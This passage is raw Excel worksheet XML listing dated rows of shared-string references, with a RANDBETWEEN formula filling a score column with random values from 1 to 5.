      <c r="E23325" t="s">
        <v>21101</v>
      </c>
      <c r="F23325">
        <f t="shared" ca="1" si="364"/>
        <v>2</v>
      </c>
    </row>
    <row r="23326" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23326" s="1">
        <v>43020.461689814816</v>
      </c>
      <c r="C23326" t="s">
        <v>10</v>
      </c>
      <c r="D23326" t="s">
        <v>178</v>
      </c>
      <c r="E23326" t="s">
        <v>21102</v>
      </c>
      <c r="F23326">
        <f t="shared" ca="1" si="364"/>
        <v>4</v>
      </c>
    </row>
    <row r="23327" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A23327" s="1">
        <v>43020.453182870369</v>
      </c>
      <c r="C23327" t="s">
        <v>6</v>
      </c>
      <c r="D23327" t="s">
        <v>821</v>
      </c>
      <c r="E23327" s="2" t="s">
        <v>21103</v>
      </c>
      <c r="F23327">
        <f t="shared" ca="1" si="364"/>
        <v>5</v>
      </c>
    </row>
    <row r="23328" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A23328" s="1">
        <v>43020.449131944442</v>
      </c>
      <c r="C23328" t="s">
        <v>6</v>
      </c>
      <c r="D23328" t="s">
        <v>194</v>
      </c>
      <c r="E23328" s="2" t="s">
        <v>21104</v>
      </c>
      <c r="F23328">
        <f t="shared" ca="1" si="364"/>
        <v>5</v>
      </c>
    </row>
    <row r="23329" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23329" s="1">
        <v>43020.417812500003</v>
      </c>
      <c r="C23329" t="s">
        <v>178</v>
      </c>
      <c r="E23329" s="2" t="s">
        <v>21105</v>
      </c>
      <c r="F23329">
        <f t="shared" ca="1" si="364"/>
        <v>4</v>
      </c>
    </row>
    <row r="23330" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23330" s="1">
        <v>43020.397430555553</v>
      </c>
      <c r="C23330" t="s">
        <v>10</v>
      </c>
      <c r="D23330" t="s">
        <v>14</v>
      </c>
      <c r="E23330" s="2" t="s">
        <v>21106</v>
      </c>
      <c r="F23330">
        <f t="shared" ca="1" si="364"/>
        <v>5</v>
      </c>
    </row>
    <row r="23331" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23331" s="1">
        <v>43020.364062499997</v>
      </c>
      <c r="C23331" t="s">
        <v>124</v>
      </c>
      <c r="E23331" t="s">
        <v>21107</v>
      </c>
      <c r="F23331">
        <f t="shared" ca="1" si="364"/>
        <v>5</v>
      </c>
    </row>
    <row r="23332" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23332" s="1">
        <v>43020.336898148147</v>
      </c>
      <c r="C23332" t="s">
        <v>103</v>
      </c>
      <c r="E23332" t="s">
        <v>21108</v>
      </c>
      <c r="F23332">
        <f t="shared" ca="1" si="364"/>
        <v>3</v>
      </c>
    </row>
    <row r="23333" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23333" s="1">
        <v>43020.3203587963</v>
      </c>
      <c r="C23333" t="s">
        <v>41</v>
      </c>
      <c r="E23333" t="s">
        <v>21109</v>
      </c>
      <c r="F23333">
        <f t="shared" ca="1" si="364"/>
        <v>3</v>
      </c>
    </row>
    <row r="23334" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23334" s="1">
        <v>43020.319432870368</v>
      </c>
      <c r="C23334" t="s">
        <v>65</v>
      </c>
      <c r="E23334" t="s">
        <v>21110</v>
      </c>
      <c r="F23334">
        <f t="shared" ca="1" si="364"/>
        <v>2</v>
      </c>
    </row>
    <row r="23335" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A23335" s="1">
        <v>43020.265138888892</v>
      </c>
      <c r="C23335" t="s">
        <v>48</v>
      </c>
      <c r="E23335" s="2" t="s">
        <v>21111</v>
      </c>
      <c r="F23335">
        <f t="shared" ca="1" si="364"/>
        <v>5</v>
      </c>
    </row>
    <row r="23336" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23336" s="1">
        <v>43020.262615740743</v>
      </c>
      <c r="C23336" t="s">
        <v>48</v>
      </c>
      <c r="E23336" s="2" t="s">
        <v>21112</v>
      </c>
      <c r="F23336">
        <f t="shared" ca="1" si="364"/>
        <v>2</v>
      </c>
    </row>
    <row r="23337" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23337" s="1">
        <v>43020.243773148148</v>
      </c>
      <c r="C23337" t="s">
        <v>189</v>
      </c>
      <c r="E23337" t="s">
        <v>21113</v>
      </c>
      <c r="F23337">
        <f t="shared" ca="1" si="364"/>
        <v>1</v>
      </c>
    </row>
    <row r="23338" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23338" s="1">
        <v>43020.242118055554</v>
      </c>
      <c r="C23338" t="s">
        <v>71</v>
      </c>
      <c r="E23338" t="s">
        <v>21114</v>
      </c>
      <c r="F23338">
        <f t="shared" ca="1" si="364"/>
        <v>2</v>
      </c>
    </row>
    <row r="23339" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23339" s="1">
        <v>43020.212453703702</v>
      </c>
      <c r="C23339" t="s">
        <v>134</v>
      </c>
      <c r="E23339" t="s">
        <v>21115</v>
      </c>
      <c r="F23339">
        <f t="shared" ca="1" si="364"/>
        <v>3</v>
      </c>
    </row>
    <row r="23340" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23340" s="1">
        <v>43020.186608796299</v>
      </c>
      <c r="C23340" t="s">
        <v>1050</v>
      </c>
      <c r="E23340" s="2" t="s">
        <v>21116</v>
      </c>
      <c r="F23340">
        <f t="shared" ca="1" si="364"/>
        <v>4</v>
      </c>
    </row>
    <row r="23341" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A23341" s="1">
        <v>43020.132974537039</v>
      </c>
      <c r="C23341" t="s">
        <v>43</v>
      </c>
      <c r="E23341" s="2" t="s">
        <v>21117</v>
      </c>
      <c r="F23341">
        <f t="shared" ca="1" si="364"/>
        <v>1</v>
      </c>
    </row>
    <row r="23342" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23342" s="1">
        <v>43020.03533564815</v>
      </c>
      <c r="C23342" t="s">
        <v>140</v>
      </c>
      <c r="D23342" t="s">
        <v>2214</v>
      </c>
      <c r="E23342" s="2" t="s">
        <v>21118</v>
      </c>
      <c r="F23342">
        <f t="shared" ca="1" si="364"/>
        <v>2</v>
      </c>
    </row>
    <row r="23343" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23343" s="1">
        <v>43020.001863425925</v>
      </c>
      <c r="C23343" t="s">
        <v>10</v>
      </c>
      <c r="D23343" t="s">
        <v>6</v>
      </c>
      <c r="E23343" t="s">
        <v>21119</v>
      </c>
      <c r="F23343">
        <f t="shared" ca="1" si="364"/>
        <v>5</v>
      </c>
    </row>
    <row r="23344" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23344" s="1">
        <v>43019.981145833335</v>
      </c>
      <c r="C23344" t="s">
        <v>144</v>
      </c>
      <c r="D23344" t="s">
        <v>480</v>
      </c>
      <c r="E23344" s="2" t="s">
        <v>21120</v>
      </c>
      <c r="F23344">
        <f t="shared" ca="1" si="364"/>
        <v>5</v>
      </c>
    </row>
    <row r="23345" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23345" s="1">
        <v>43019.80740740741</v>
      </c>
      <c r="C23345" t="s">
        <v>10</v>
      </c>
      <c r="D23345" t="s">
        <v>6</v>
      </c>
      <c r="E23345" t="s">
        <v>21121</v>
      </c>
      <c r="F23345">
        <f t="shared" ca="1" si="364"/>
        <v>3</v>
      </c>
    </row>
    <row r="23346" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23346" s="1">
        <v>43019.804884259262</v>
      </c>
      <c r="C23346" t="s">
        <v>10</v>
      </c>
      <c r="D23346" t="s">
        <v>11</v>
      </c>
      <c r="E23346" s="2" t="s">
        <v>21122</v>
      </c>
      <c r="F23346">
        <f t="shared" ca="1" si="364"/>
        <v>1</v>
      </c>
    </row>
    <row r="23347" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23347" s="1">
        <v>43019.771701388891</v>
      </c>
      <c r="C23347" t="s">
        <v>10</v>
      </c>
      <c r="D23347" t="s">
        <v>6</v>
      </c>
      <c r="E23347" t="s">
        <v>21123</v>
      </c>
      <c r="F23347">
        <f t="shared" ca="1" si="364"/>
        <v>4</v>
      </c>
    </row>
    <row r="23348" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23348" s="1">
        <v>43019.728587962964</v>
      </c>
      <c r="C23348" t="s">
        <v>16</v>
      </c>
      <c r="E23348" s="2" t="s">
        <v>21124</v>
      </c>
      <c r="F23348">
        <f t="shared" ca="1" si="364"/>
        <v>5</v>
      </c>
    </row>
    <row r="23349" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23349" s="1">
        <v>43019.65934027778</v>
      </c>
      <c r="C23349" t="s">
        <v>10</v>
      </c>
      <c r="D23349" t="s">
        <v>20</v>
      </c>
      <c r="E23349" t="s">
        <v>21125</v>
      </c>
      <c r="F23349">
        <f t="shared" ca="1" si="364"/>
        <v>3</v>
      </c>
    </row>
    <row r="23350" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23350" s="1">
        <v>43019.659236111111</v>
      </c>
      <c r="C23350" t="s">
        <v>318</v>
      </c>
      <c r="E23350" t="s">
        <v>21126</v>
      </c>
      <c r="F23350">
        <f t="shared" ca="1" si="364"/>
        <v>4</v>
      </c>
    </row>
    <row r="23351" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23351" s="1">
        <v>43019.652141203704</v>
      </c>
      <c r="C23351" t="s">
        <v>10</v>
      </c>
      <c r="D23351" t="s">
        <v>336</v>
      </c>
      <c r="E23351" t="s">
        <v>21127</v>
      </c>
      <c r="F23351">
        <f t="shared" ca="1" si="364"/>
        <v>1</v>
      </c>
    </row>
    <row r="23352" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23352" s="1">
        <v>43019.649976851855</v>
      </c>
      <c r="C23352" t="s">
        <v>10</v>
      </c>
      <c r="D23352" t="s">
        <v>89</v>
      </c>
      <c r="E23352" s="2" t="s">
        <v>21128</v>
      </c>
      <c r="F23352">
        <f t="shared" ca="1" si="364"/>
        <v>1</v>
      </c>
    </row>
    <row r="23353" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23353" s="1">
        <v>43019.649791666663</v>
      </c>
      <c r="C23353" t="s">
        <v>10</v>
      </c>
      <c r="D23353" t="s">
        <v>89</v>
      </c>
      <c r="E23353" s="2" t="s">
        <v>21128</v>
      </c>
      <c r="F23353">
        <f t="shared" ca="1" si="364"/>
        <v>5</v>
      </c>
    </row>
    <row r="23354" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23354" s="1">
        <v>43019.64947916667</v>
      </c>
      <c r="C23354" t="s">
        <v>10</v>
      </c>
      <c r="D23354" t="s">
        <v>192</v>
      </c>
      <c r="E23354" t="s">
        <v>21129</v>
      </c>
      <c r="F23354">
        <f t="shared" ca="1" si="364"/>
        <v>3</v>
      </c>
    </row>
    <row r="23355" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23355" s="1">
        <v>43019.636701388888</v>
      </c>
      <c r="C23355" t="s">
        <v>10</v>
      </c>
      <c r="D23355" t="s">
        <v>89</v>
      </c>
      <c r="E23355" t="s">
        <v>21130</v>
      </c>
      <c r="F23355">
        <f t="shared" ca="1" si="364"/>
        <v>4</v>
      </c>
    </row>
    <row r="23356" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23356" s="1">
        <v>43019.631168981483</v>
      </c>
      <c r="C23356" t="s">
        <v>10</v>
      </c>
      <c r="D23356" t="s">
        <v>263</v>
      </c>
      <c r="E23356" t="s">
        <v>21131</v>
      </c>
      <c r="F23356">
        <f t="shared" ca="1" si="364"/>
        <v>4</v>
      </c>
    </row>
    <row r="23357" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23357" s="1">
        <v>43019.630046296297</v>
      </c>
      <c r="C23357" t="s">
        <v>6</v>
      </c>
      <c r="D23357" t="s">
        <v>25</v>
      </c>
      <c r="E23357" s="2" t="s">
        <v>21132</v>
      </c>
      <c r="F23357">
        <f t="shared" ca="1" si="364"/>
        <v>1</v>
      </c>
    </row>
    <row r="23358" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23358" s="1">
        <v>43019.626562500001</v>
      </c>
      <c r="C23358" t="s">
        <v>10</v>
      </c>
      <c r="D23358" t="s">
        <v>163</v>
      </c>
      <c r="E23358" t="s">
        <v>21133</v>
      </c>
      <c r="F23358">
        <f t="shared" ca="1" si="364"/>
        <v>1</v>
      </c>
    </row>
    <row r="23359" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23359" s="1">
        <v>43019.625358796293</v>
      </c>
      <c r="C23359" t="s">
        <v>10</v>
      </c>
      <c r="D23359" t="s">
        <v>6</v>
      </c>
      <c r="E23359" t="s">
        <v>21134</v>
      </c>
      <c r="F23359">
        <f t="shared" ca="1" si="364"/>
        <v>5</v>
      </c>
    </row>
    <row r="23360" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23360" s="1">
        <v>43019.621423611112</v>
      </c>
      <c r="C23360" t="s">
        <v>16</v>
      </c>
      <c r="E23360" t="s">
        <v>21135</v>
      </c>
      <c r="F23360">
        <f t="shared" ca="1" si="364"/>
        <v>5</v>
      </c>
    </row>
    <row r="23361" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23361" s="1">
        <v>43019.605821759258</v>
      </c>
      <c r="C23361" t="s">
        <v>10</v>
      </c>
      <c r="D23361" t="s">
        <v>244</v>
      </c>
      <c r="E23361" t="s">
        <v>21136</v>
      </c>
      <c r="F23361">
        <f t="shared" ca="1" si="364"/>
        <v>2</v>
      </c>
    </row>
    <row r="23362" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23362" s="1">
        <v>43019.603865740741</v>
      </c>
      <c r="C23362" t="s">
        <v>10</v>
      </c>
      <c r="D23362" t="s">
        <v>6</v>
      </c>
      <c r="E23362" t="s">
        <v>21137</v>
      </c>
      <c r="F23362">
        <f t="shared" ref="F23362:F23425" ca="1" si="365">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="23363" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23363" s="1">
        <v>43019.594085648147</v>
      </c>
      <c r="C23363" t="s">
        <v>10</v>
      </c>
      <c r="D23363" t="s">
        <v>336</v>
      </c>
      <c r="E23363" t="s">
        <v>21138</v>
      </c>
      <c r="F23363">
        <f t="shared" ca="1" si="365"/>
        <v>5</v>
      </c>
    </row>
    <row r="23364" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23364" s="1">
        <v>43019.585960648146</v>
      </c>
      <c r="C23364" t="s">
        <v>41</v>
      </c>
      <c r="E23364" s="2" t="s">
        <v>21139</v>
      </c>
      <c r="F23364">
        <f t="shared" ca="1" si="365"/>
        <v>5</v>
      </c>
    </row>
    <row r="23365" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23365" s="1">
        <v>43019.550752314812</v>
      </c>
      <c r="C23365" t="s">
        <v>10</v>
      </c>
      <c r="D23365" t="s">
        <v>6</v>
      </c>
      <c r="E23365" t="s">
        <v>21140</v>
      </c>
      <c r="F23365">
        <f t="shared" ca="1" si="365"/>
        <v>2</v>
      </c>
    </row>
    <row r="23366" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23366" s="1">
        <v>43019.544606481482</v>
      </c>
      <c r="C23366" t="s">
        <v>41</v>
      </c>
      <c r="E23366" t="s">
        <v>21141</v>
      </c>
      <c r="F23366">
        <f t="shared" ca="1" si="365"/>
        <v>4</v>
      </c>
    </row>
    <row r="23367" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23367" s="1">
        <v>43019.543877314813</v>
      </c>
      <c r="C23367" t="s">
        <v>10</v>
      </c>
      <c r="D23367" t="s">
        <v>271</v>
      </c>
      <c r="E23367" t="s">
        <v>21142</v>
      </c>
      <c r="F23367">
        <f t="shared" ca="1" si="365"/>
        <v>2</v>
      </c>
    </row>
    <row r="23368" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23368" s="1">
        <v>43019.542118055557</v>
      </c>
      <c r="C23368" t="s">
        <v>6</v>
      </c>
      <c r="D23368" t="s">
        <v>821</v>
      </c>
      <c r="E23368" t="s">
        <v>21143</v>
      </c>
      <c r="F23368">
        <f t="shared" ca="1" si="365"/>
        <v>4</v>
      </c>
    </row>
    <row r="23369" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23369" s="1">
        <v>43019.53769675926</v>
      </c>
      <c r="C23369" t="s">
        <v>10</v>
      </c>
      <c r="D23369" t="s">
        <v>11</v>
      </c>
      <c r="E23369" t="s">
        <v>21144</v>
      </c>
      <c r="F23369">
        <f t="shared" ca="1" si="365"/>
        <v>2</v>
      </c>
    </row>
    <row r="23370" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23370" s="1">
        <v>43019.521851851852</v>
      </c>
      <c r="C23370" t="s">
        <v>41</v>
      </c>
      <c r="E23370" t="s">
        <v>21145</v>
      </c>
      <c r="F23370">
        <f t="shared" ca="1" si="365"/>
        <v>4</v>
      </c>
    </row>
    <row r="23371" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23371" s="1">
        <v>43019.504351851851</v>
      </c>
      <c r="C23371" t="s">
        <v>808</v>
      </c>
      <c r="E23371" t="s">
        <v>21146</v>
      </c>
      <c r="F23371">
        <f t="shared" ca="1" si="365"/>
        <v>4</v>
      </c>
    </row>
    <row r="23372" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23372" s="1">
        <v>43019.488645833335</v>
      </c>
      <c r="C23372" t="s">
        <v>6</v>
      </c>
      <c r="D23372" t="s">
        <v>25</v>
      </c>
      <c r="E23372" t="s">
        <v>21147</v>
      </c>
      <c r="F23372">
        <f t="shared" ca="1" si="365"/>
        <v>4</v>
      </c>
    </row>
    <row r="23373" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23373" s="1">
        <v>43019.484340277777</v>
      </c>
      <c r="C23373" t="s">
        <v>6</v>
      </c>
      <c r="D23373" t="s">
        <v>25</v>
      </c>
      <c r="E23373" t="s">
        <v>21148</v>
      </c>
      <c r="F23373">
        <f t="shared" ca="1" si="365"/>
        <v>5</v>
      </c>
    </row>
    <row r="23374" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23374" s="1">
        <v>43019.479050925926</v>
      </c>
      <c r="C23374" t="s">
        <v>10</v>
      </c>
      <c r="D23374" t="s">
        <v>11</v>
      </c>
      <c r="E23374" s="2" t="s">
        <v>21149</v>
      </c>
      <c r="F23374">
        <f t="shared" ca="1" si="365"/>
        <v>2</v>
      </c>
    </row>
    <row r="23375" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23375" s="1">
        <v>43019.459502314814</v>
      </c>
      <c r="C23375" t="s">
        <v>10</v>
      </c>
      <c r="D23375" t="s">
        <v>89</v>
      </c>
      <c r="E23375" t="s">
        <v>21150</v>
      </c>
      <c r="F23375">
        <f t="shared" ca="1" si="365"/>
        <v>5</v>
      </c>
    </row>
    <row r="23376" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23376" s="1">
        <v>43019.459236111114</v>
      </c>
      <c r="C23376" t="s">
        <v>10</v>
      </c>
      <c r="D23376" t="s">
        <v>178</v>
      </c>
      <c r="E23376" t="s">
        <v>21151</v>
      </c>
      <c r="F23376">
        <f t="shared" ca="1" si="365"/>
        <v>4</v>
      </c>
    </row>
    <row r="23377" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23377" s="1">
        <v>43019.451770833337</v>
      </c>
      <c r="C23377" t="s">
        <v>10</v>
      </c>
      <c r="D23377" t="s">
        <v>336</v>
      </c>
      <c r="E23377" t="s">
        <v>21152</v>
      </c>
      <c r="F23377">
        <f t="shared" ca="1" si="365"/>
        <v>4</v>
      </c>
    </row>
    <row r="23378" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23378" s="1">
        <v>43019.451631944445</v>
      </c>
      <c r="C23378" t="s">
        <v>10</v>
      </c>
      <c r="D23378" t="s">
        <v>163</v>
      </c>
      <c r="E23378" t="s">
        <v>21153</v>
      </c>
      <c r="F23378">
        <f t="shared" ca="1" si="365"/>
        <v>1</v>
      </c>
    </row>
    <row r="23379" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A23379" s="1">
        <v>43019.446157407408</v>
      </c>
      <c r="C23379" t="s">
        <v>6</v>
      </c>
      <c r="D23379" t="s">
        <v>25</v>
      </c>
      <c r="E23379" s="2" t="s">
        <v>21154</v>
      </c>
      <c r="F23379">
        <f t="shared" ca="1" si="365"/>
        <v>5</v>
      </c>
    </row>
    <row r="23380" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23380" s="1">
        <v>43019.445462962962</v>
      </c>
      <c r="C23380" t="s">
        <v>10</v>
      </c>
      <c r="D23380" t="s">
        <v>52</v>
      </c>
      <c r="E23380" t="s">
        <v>21155</v>
      </c>
      <c r="F23380">
        <f t="shared" ca="1" si="365"/>
        <v>4</v>
      </c>
    </row>
    <row r="23381" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23381" s="1">
        <v>43019.435856481483</v>
      </c>
      <c r="C23381" t="s">
        <v>10</v>
      </c>
      <c r="D23381" t="s">
        <v>494</v>
      </c>
      <c r="E23381" t="s">
        <v>21156</v>
      </c>
      <c r="F23381">
        <f t="shared" ca="1" si="365"/>
        <v>3</v>
      </c>
    </row>
    <row r="23382" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23382" s="1">
        <v>43019.415381944447</v>
      </c>
      <c r="C23382" t="s">
        <v>6</v>
      </c>
      <c r="D23382" t="s">
        <v>25</v>
      </c>
      <c r="E23382" s="2" t="s">
        <v>21157</v>
      </c>
      <c r="F23382">
        <f t="shared" ca="1" si="365"/>
        <v>2</v>
      </c>
    </row>
    <row r="23383" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23383" s="1">
        <v>43019.407280092593</v>
      </c>
      <c r="C23383" t="s">
        <v>6</v>
      </c>
      <c r="D23383" t="s">
        <v>25</v>
      </c>
      <c r="E23383" t="s">
        <v>21158</v>
      </c>
      <c r="F23383">
        <f t="shared" ca="1" si="365"/>
        <v>4</v>
      </c>
    </row>
    <row r="23384" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23384" s="1">
        <v>43019.407037037039</v>
      </c>
      <c r="C23384" t="s">
        <v>10</v>
      </c>
      <c r="D23384" t="s">
        <v>36</v>
      </c>
      <c r="E23384" t="s">
        <v>21159</v>
      </c>
      <c r="F23384">
        <f t="shared" ca="1" si="365"/>
        <v>3</v>
      </c>
    </row>
    <row r="23385" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23385" s="1">
        <v>43019.405289351853</v>
      </c>
      <c r="C23385" t="s">
        <v>222</v>
      </c>
      <c r="F23385">
        <f t="shared" ca="1" si="365"/>
        <v>2</v>
      </c>
    </row>
    <row r="23386" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23386" s="1">
        <v>43019.396608796298</v>
      </c>
      <c r="C23386" t="s">
        <v>10</v>
      </c>
      <c r="D23386" t="s">
        <v>89</v>
      </c>
      <c r="E23386" t="s">
        <v>21160</v>
      </c>
      <c r="F23386">
        <f t="shared" ca="1" si="365"/>
        <v>4</v>
      </c>
    </row>
    <row r="23387" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23387" s="1">
        <v>43019.394976851851</v>
      </c>
      <c r="C23387" t="s">
        <v>10</v>
      </c>
      <c r="D23387" t="s">
        <v>178</v>
      </c>
      <c r="E23387" t="s">
        <v>21161</v>
      </c>
      <c r="F23387">
        <f t="shared" ca="1" si="365"/>
        <v>5</v>
      </c>
    </row>
    <row r="23388" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23388" s="1">
        <v>43019.387569444443</v>
      </c>
      <c r="C23388" t="s">
        <v>10</v>
      </c>
      <c r="D23388" t="s">
        <v>36</v>
      </c>
      <c r="E23388" t="s">
        <v>21162</v>
      </c>
      <c r="F23388">
        <f t="shared" ca="1" si="365"/>
        <v>4</v>
      </c>
    </row>
    <row r="23389" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23389" s="1">
        <v>43019.380381944444</v>
      </c>
      <c r="C23389" t="s">
        <v>10</v>
      </c>
      <c r="D23389" t="s">
        <v>112</v>
      </c>
      <c r="E23389" t="s">
        <v>21163</v>
      </c>
      <c r="F23389">
        <f t="shared" ca="1" si="365"/>
        <v>3</v>
      </c>
    </row>
    <row r="23390" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23390" s="1">
        <v>43019.345682870371</v>
      </c>
      <c r="C23390" t="s">
        <v>43</v>
      </c>
      <c r="E23390" t="s">
        <v>21164</v>
      </c>
      <c r="F23390">
        <f t="shared" ca="1" si="365"/>
        <v>1</v>
      </c>
    </row>
    <row r="23391" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23391" s="1">
        <v>43019.320775462962</v>
      </c>
      <c r="C23391" t="s">
        <v>10</v>
      </c>
      <c r="D23391" t="s">
        <v>494</v>
      </c>
      <c r="E23391" t="s">
        <v>21165</v>
      </c>
      <c r="F23391">
        <f t="shared" ca="1" si="365"/>
        <v>3</v>
      </c>
    </row>
    <row r="23392" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A23392" s="1">
        <v>43019.310740740744</v>
      </c>
      <c r="C23392" t="s">
        <v>6</v>
      </c>
      <c r="D23392" t="s">
        <v>25</v>
      </c>
      <c r="E23392" s="2" t="s">
        <v>21166</v>
      </c>
      <c r="F23392">
        <f t="shared" ca="1" si="365"/>
        <v>1</v>
      </c>
    </row>
    <row r="23393" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23393" s="1">
        <v>43019.299062500002</v>
      </c>
      <c r="C23393" t="s">
        <v>41</v>
      </c>
      <c r="E23393" t="s">
        <v>21167</v>
      </c>
      <c r="F23393">
        <f t="shared" ca="1" si="365"/>
        <v>4</v>
      </c>
    </row>
    <row r="23394" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23394" s="1">
        <v>43019.291307870371</v>
      </c>
      <c r="C23394" t="s">
        <v>10</v>
      </c>
      <c r="D23394" t="s">
        <v>36</v>
      </c>
      <c r="E23394" t="s">
        <v>21168</v>
      </c>
      <c r="F23394">
        <f t="shared" ca="1" si="365"/>
        <v>5</v>
      </c>
    </row>
    <row r="23395" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23395" s="1">
        <v>43019.266643518517</v>
      </c>
      <c r="C23395" t="s">
        <v>48</v>
      </c>
      <c r="E23395" t="s">
        <v>21169</v>
      </c>
      <c r="F23395">
        <f t="shared" ca="1" si="365"/>
        <v>1</v>
      </c>
    </row>
    <row r="23396" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23396" s="1">
        <v>43019.252766203703</v>
      </c>
      <c r="C23396" t="s">
        <v>73</v>
      </c>
      <c r="E23396" t="s">
        <v>21170</v>
      </c>
      <c r="F23396">
        <f t="shared" ca="1" si="365"/>
        <v>1</v>
      </c>
    </row>
    <row r="23397" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23397" s="1">
        <v>43019.222916666666</v>
      </c>
      <c r="C23397" t="s">
        <v>1501</v>
      </c>
      <c r="E23397" t="s">
        <v>21171</v>
      </c>
      <c r="F23397">
        <f t="shared" ca="1" si="365"/>
        <v>4</v>
      </c>
    </row>
    <row r="23398" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A23398" s="1">
        <v>43019.198182870372</v>
      </c>
      <c r="C23398" t="s">
        <v>10</v>
      </c>
      <c r="D23398" t="s">
        <v>6</v>
      </c>
      <c r="E23398" s="2" t="s">
        <v>21172</v>
      </c>
      <c r="F23398">
        <f t="shared" ca="1" si="365"/>
        <v>3</v>
      </c>
    </row>
    <row r="23399" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23399" s="1">
        <v>43018.981504629628</v>
      </c>
      <c r="C23399" t="s">
        <v>124</v>
      </c>
      <c r="D23399" t="s">
        <v>312</v>
      </c>
      <c r="E23399" t="s">
        <v>21173</v>
      </c>
      <c r="F23399">
        <f t="shared" ca="1" si="365"/>
        <v>4</v>
      </c>
    </row>
    <row r="23400" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23400" s="1">
        <v>43018.917314814818</v>
      </c>
      <c r="C23400" t="s">
        <v>10</v>
      </c>
      <c r="D23400" t="s">
        <v>17</v>
      </c>
      <c r="E23400" t="s">
        <v>21174</v>
      </c>
      <c r="F23400">
        <f t="shared" ca="1" si="365"/>
        <v>5</v>
      </c>
    </row>
    <row r="23401" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23401" s="1">
        <v>43018.912824074076</v>
      </c>
      <c r="C23401" t="s">
        <v>6</v>
      </c>
      <c r="D23401" t="s">
        <v>25</v>
      </c>
      <c r="E23401" t="s">
        <v>21175</v>
      </c>
      <c r="F23401">
        <f t="shared" ca="1" si="365"/>
        <v>4</v>
      </c>
    </row>
    <row r="23402" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23402" s="1">
        <v>43018.898773148147</v>
      </c>
      <c r="C23402" t="s">
        <v>140</v>
      </c>
      <c r="D23402" t="s">
        <v>141</v>
      </c>
      <c r="E23402" t="s">
        <v>21176</v>
      </c>
      <c r="F23402">
        <f t="shared" ca="1" si="365"/>
        <v>3</v>
      </c>
    </row>
    <row r="23403" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23403" s="1">
        <v>43018.847696759258</v>
      </c>
      <c r="C23403" t="s">
        <v>10</v>
      </c>
      <c r="D23403" t="s">
